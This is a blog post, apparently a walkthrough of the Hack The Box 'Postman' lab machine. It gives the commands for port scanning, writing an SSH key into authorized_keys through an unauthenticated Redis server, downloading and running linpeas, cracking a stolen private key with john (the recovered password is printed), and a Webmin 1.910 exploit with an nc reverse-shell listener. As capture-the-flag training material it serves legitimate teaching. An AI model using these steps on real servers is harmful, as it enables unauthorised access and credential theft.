<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : TheCyberGeekIP : 10.10.10.160[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- -T5 -n 10.10.10.160
 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6379/tcp open redis 10000/tcp open snet-sensor-mgmt Once seen open ports, let&amp;rsquo;s get a deeper scan :'><title>[8] Postman Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/postman-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[8] Postman Hackthebox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : TheCyberGeekIP : 10.10.10.160[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- -T5 -n 10.10.10.160
 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6379/tcp open redis 10000/tcp open snet-sensor-mgmt Once seen open ports, let&amp;rsquo;s get a deeper scan :'>
<meta property='og:url' content='https://example.com/posts/postman-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-25T01:28:00&#43;01:00'/><meta property='article:modified_time' content='2021-03-25T01:28:00&#43;01:00'/>
<meta name="twitter:title" content="[8] Postman Hackthebox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : TheCyberGeekIP : 10.10.10.160[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- -T5 -n 10.10.10.160
 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6379/tcp open redis 10000/tcp open snet-sensor-mgmt Once seen open ports, let&amp;rsquo;s get a deeper scan :">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/postman-hackthebox/">[8] Postman Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 25, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <p><img src="/static/HACKING/postman-index.jpg" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-2---privesc" >PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Linux :penguin:
Difficulty : Easy :waxing_gibbous_moon:
Owner : TheCyberGeek
IP : 10.10.10.160
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>The first step is scanning machine&rsquo;s ports with nmap:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;-T5&#43;-n&#43;10.10.10.160"  target="_blank" rel="noopener"
    >nmap -p- -T5 -n 10.10.10.160</a></p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt
</code></pre></div><p>Once seen open ports, let&rsquo;s get a deeper scan :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sC&#43;-sV&#43;-sS&#43;-p22%2C80%2C6379%2C10000&#43;10.10.10.160"  target="_blank" rel="noopener"
    >nmap -sC -sV -sS -p22,80,6379,10000 10.10.10.160</a></p>
</blockquote>
<pre><code class="language-ssh" data-lang="ssh">PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>Here we can point out 3 services :</p>
<blockquote>
<p><a class="link" href="#1-http-server" >1: HTTP SERVER</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="#2-webmin" >2: MiniServe 1.910 (Webmin)</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="#3-redis-key-value-store" >3: REDIS KEY-VALUE STORE 4.0.9</a></p>
</blockquote>
<h3 id="1-http-server">1: HTTP SERVER</h3>
<p><img src="/static/HACKING/postman-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>About the services running on the web we can&rsquo;t stand out anything &ldquo;interesting&rdquo;, so let&rsquo;s try to fuzz it, in my case I&rsquo;ll be using <code>wfuzz</code> :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt &ndash;hc=404 -L -u http://10.10.10.160/FUZZ</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.160/FUZZ
Total requests: <span class="nv">207643</span>

<span class="o">=====================================================================</span>
ID           Response   Lines    Word       Chars       <span class="nv">Payload</span>                                           
<span class="o">=====================================================================</span>                                      
000000014:   <span class="m">200</span>        <span class="m">91</span> L     <span class="m">253</span> W      <span class="m">3844</span> Ch     <span class="s2">&#34;http://10.10.10.160/&#34;</span>                            
000000013:   <span class="m">200</span>        <span class="m">91</span> L     <span class="m">253</span> W      <span class="m">3844</span> Ch     <span class="s2">&#34;#&#34;</span>                                               
000000016:   <span class="m">200</span>        <span class="m">20</span> L     <span class="m">97</span> W       <span class="m">1749</span> Ch     <span class="s2">&#34;images&#34;</span>                                          
000000361:   <span class="m">200</span>        <span class="m">51</span> L     <span class="m">387</span> W      <span class="m">8141</span> Ch     <span class="s2">&#34;upload&#34;</span>                                          
000000543:   <span class="m">200</span>        <span class="m">30</span> L     <span class="m">191</span> W      <span class="m">3867</span> Ch     <span class="s2">&#34;css&#34;</span>                                             
000000920:   <span class="m">200</span>        <span class="m">25</span> L     <span class="m">156</span> W      <span class="m">2767</span> Ch     <span class="s2">&#34;js&#34;</span>                                              
000002589:   <span class="m">200</span>        <span class="m">26</span> L     <span class="m">159</span> W      <span class="m">3119</span> Ch     <span class="s2">&#34;fonts&#34;</span>                                           
000041849:   <span class="m">200</span>        <span class="m">91</span> L     <span class="m">253</span> W      <span class="m">3844</span> Ch     <span class="s2">&#34;http://10.10.10.160/&#34;</span>
</code></pre></div><p>Nothing interesting imo. Let&rsquo;s try luck with Redis.</p>
<h3 id="2-webmin">2: WEBMIN</h3>
<p><img src="/static/HACKING/postman-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Firs of all we have to add 10.10.10.160 to our /etc/hosts :</p>
<p><img src="/static/HACKING/postman-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Now let&rsquo;s go to <a class="link" href="http://postman:10000"  target="_blank" rel="noopener"
    >http://postman:10000</a> :</p>
<p><img src="/static/HACKING/postman-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>After a little research, I found a <a class="link" href="https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/blob/master/exploit_poc.py"  target="_blank" rel="noopener"
    >exploit</a> for this service, but it&rsquo;s necessary a user&amp;pass, so we&rsquo;ll check this later.</p>
<h3 id="3-redis-key-value-store">3: REDIS KEY-VALUE STORE</h3>
<p>Here we&rsquo;ll be using a tool called &ldquo;redis-cli&rdquo;, I have found a <a class="link" href="https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html"  target="_blank" rel="noopener"
    >BLOG</a> that explains all this process´perfectly :</p>
<p>So, the first step is checking if we have access without AUTH :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=telnet&#43;10.10.10.160&#43;6379"  target="_blank" rel="noopener"
    >telnet 10.10.10.160 6379</a></p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">Trying</span> <span class="m">10.10.10.160</span><span class="kc">...</span>
<span class="n">Connected</span> <span class="n">to</span> <span class="m">10.10.10.160</span><span class="n">.
</span><span class="n">Escape</span> <span class="n">character</span> <span class="n">is</span> <span class="s">&#39;^]&#39;</span><span class="n">.
</span></code></pre></div><blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=echo&#43;%22Hey&#43;no&#43;AUTH&#43;required%21%22"  target="_blank" rel="noopener"
    >echo &ldquo;Hey no AUTH required!&quot;</a></p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="o">$</span><span class="m">21</span>
<span class="n">Hey</span> <span class="n">no</span> <span class="n">AUTH</span> <span class="n">required</span><span class="o">!</span>
</code></pre></div><p>So yeah! We have access, now we have to generate a new SSH key. But, why? Redis is unprotected without a password setup, and we can write on files, so I&rsquo;ll try to write into ~/ssh/authorized_keys in order to gain access. The goal is upload the key to Redis server memory and transfer it into a file.</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=ssh-keygen&#43;-t&#43;rsa&#43;-C&#43;%22crack%40redis.io%22"  target="_blank" rel="noopener"
    >ssh-keygen -t rsa -C &ldquo;crack@redis.io&rdquo;</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=%28echo&#43;-e&#43;%22%5Cn%5Cn%22%3B&#43;cat&#43;%7E%2F.ssh%2Fid_rsa.pub%3B&#43;echo&#43;-e&#43;%22%5Cn%5Cn%22%29&#43;%3E&#43;pass.txt"  target="_blank" rel="noopener"
    >(echo -e &ldquo;\n\n&rdquo;; cat ~/.ssh/id_rsa.pub; echo -e &ldquo;\n\n&rdquo;) &gt; pass.txt</a></p>
</blockquote>
<p>Now pass.txt is just our public key but with newlines. We can write this string inside the memory of Redis using redis-cli:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=redis-cli&#43;-h&#43;10.10.10.160&#43;flushall"  target="_blank" rel="noopener"
    >redis-cli -h 10.10.10.160 flushall</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=cat&#43;pass.txt&#43;%7C&#43;redis-cli&#43;-h&#43;10.10.10.160&#43;-x&#43;set&#43;s-key"  target="_blank" rel="noopener"
    >cat pass.txt | redis-cli -h 10.10.10.160 -x set s-key</a></p>
</blockquote>
<p>Now it is supposed to be up, let&rsquo;s check :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=redis-cli&#43;-h&#43;10.10.10.160"  target="_blank" rel="noopener"
    >redis-cli -h 10.10.10.160</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=get&#43;s-key"  target="_blank" rel="noopener"
    >get s-key</a></p>
</blockquote>
<pre><code>&quot;\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7P+0PjFgzBeTHJWN/faaZDyY3Vep/jD5alt+5bjnMJKZTgKyRRHGCjrqAAFqIkdERddrP8B/hpGK2U4WODWFLzW39PJRqjyj7fN8Rex6lrenlF0XD8pb7uHjo+yZSHlbFAkraGpHeU10aqlHxrOkGIJdIuq+r8ZRH8IeuzXBZDAcALbvSAHUTq3gfeDme7WxUgElRNxU6zONGgocHLZP7si11mhlen+Zh1+9+MdAOVoizva2TUIJh8/8NvBvFOnQPzyUm5dGypzj1Feh1gpIQQOjdo/xS9NO4e2djKVkgaa+EwsmkCRpjOp0aAl9wQVeEEQ42K+AbxP0yRl24ScNr4Bu5WyV+FaTBZIoT66gxVKAVxeY7vl8FxxoQEdHBtx9pBi5Ji3uJBUsZg7pkYZYEE3MpCd9tMm5bZlTVlqCo0cu8/d4Vf5pX37GCDqAShnlkQQfvJtcRIynB0vH/qNyNN9L6KncN8bzfZpCNlE+/zPY5UdMEUxFJ0KfdvEvF2fs= crack@redis.io\n\n\n\n&quot;
</code></pre><p>Oh yeah it&rsquo;s up, now we have to save it inside authorized_keys as the post says :</p>
<blockquote>
<p>CONFIG GET DIR</p>
</blockquote>
<pre><code>1) &quot;dir&quot;
2) &quot;/var/lib/redis/.ssh&quot;
</code></pre><blockquote>
<p>config set dir /var/lib/redis/.ssh/</p>
</blockquote>
<blockquote>
<p>config set dbfilename &ldquo;authorized_keys&rdquo;</p>
</blockquote>
<blockquote>
<p>save</p>
</blockquote>
<p>Now we should be able to login through ssh:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=ssh&#43;-i&#43;%7E%2F.ssh%2Fid_rsa&#43;redis%4010.10.10.160"  target="_blank" rel="noopener"
    >ssh -i ~/.ssh/id_rsa redis@10.10.10.160</a></p>
</blockquote>
<p>Awesome 😊 !</p>
<p>Here you have a lot of options, but in my case I&rsquo;ll be using <a class="link" href="https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh"  target="_blank" rel="noopener"
    >Linpeas.sh</a> to ennumerate :</p>
<h3 id="from-our-local-machine-">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<h3 id="from-the-victime-machine-">From the victime machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;http%3A%2F%2F10.10.14.29%3A8000%2Flinpeas.sh"  target="_blank" rel="noopener"
    >wget http://10.10.14.29:8000/linpeas.sh</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=chmod&#43;%2Bx&#43;linpeas.sh"  target="_blank" rel="noopener"
    >chmod +x linpeas.sh</a></p>
</blockquote>
<p>And we run it :</p>
<blockquote>
<p>./linpeas.sh</p>
</blockquote>
<p>And now let&rsquo;s see if we can find something&hellip; After a fast read I found this :</p>
<p><img src="/static/HACKING/postman-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>That&rsquo;s surely an important file, but first I&rsquo;ll check for users :</p>
<p><img src="/static/HACKING/postman-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>So let&rsquo;s try to scalate to Matt, we&rsquo;ll download the id_rsa.bak to out machine :</p>
<h3 id="from-the-victime-machine--1">From the victime machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python&#43;-m&#43;SimpleHTTPServer"  target="_blank" rel="noopener"
    >python -m SimpleHTTPServer</a></p>
</blockquote>
<h3 id="from-our-local-machine--1">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;http%3A%2F%2F10.10.10.160%3A8000%2Fopt%2Fid_rsa.bak"  target="_blank" rel="noopener"
    >wget http://10.10.10.160:8000/opt/id_rsa.bak</a></p>
</blockquote>
<h2 id="crack-id_rsa">Crack id_rsa</h2>
<p>Now we have to crack the id_rsa file, so let&rsquo;s use ssh2john.py :</p>
<ol>
<li>Turn the bak file into the hash :</li>
</ol>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python&#43;%2Fusr%2Fshare%2Fjohn%2Fssh2john.py&#43;id_rsa.bak&#43;%3E&#43;id_rsa.hash"  target="_blank" rel="noopener"
    >python /usr/share/john/ssh2john.py id_rsa.bak &gt; id_rsa.hash</a></p>
</blockquote>
<ol start="2">
<li>Crack the hash file :</li>
</ol>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=john&#43;--wordlist%3D%2Fusr%2Fshare%2Fwordlists%2Frockyou.txt&#43;id_rsa.hash"  target="_blank" rel="noopener"
    >john &ndash;wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash</a></p>
</blockquote>
<pre><code>computer2008     (id_rsa.bak)
</code></pre><p>Now let&rsquo;s try to login through ssh (first <code>chmod 400 id_rsa.bak</code>):</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=ssh&#43;-i&#43;id_rsa.bak&#43;Matt%4010.10.10.160"  target="_blank" rel="noopener"
    >ssh -i id_rsa.bak Matt@10.10.10.160</a></p>
</blockquote>
<pre><code>Connection closed by 10.10.10.160 port 22
</code></pre><p>Oh! So bad, let&rsquo;s do it directly from the redis :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=su&#43;Matt"  target="_blank" rel="noopener"
    >su Matt</a></p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">Matt</span><span class="o">@</span><span class="n">Postman</span><span class="o">:/$</span> 
</code></pre></div><h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<p>Now we can use the <a class="link" href="https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/blob/master/exploit_poc.py"  target="_blank" rel="noopener"
    >exploit</a> I found :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;exploit_poc.py&#43;--ip_address%3D10.10.10.160&#43;--port%3D10000&#43;--lhost%3D10.10.14.29&#43;--lport%3D8989&#43;--user%3DMatt&#43;--pass%3Dcomputer2008"  target="_blank" rel="noopener"
    >python3 exploit_poc.py &ndash;ip_address=10.10.10.160 &ndash;port=10000 &ndash;lhost=10.10.14.29 &ndash;lport=8989 &ndash;user=Matt &ndash;pass=computer2008</a></p>
</blockquote>
<p>We listen from our machine :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nc&#43;-lvnp&#43;8989"  target="_blank" rel="noopener"
    >nc -lvnp 8989</a></p>
</blockquote>
<p><img src="/static/HACKING/postman-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="thanks-for-reading--">THANKS FOR READING 😊 !!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

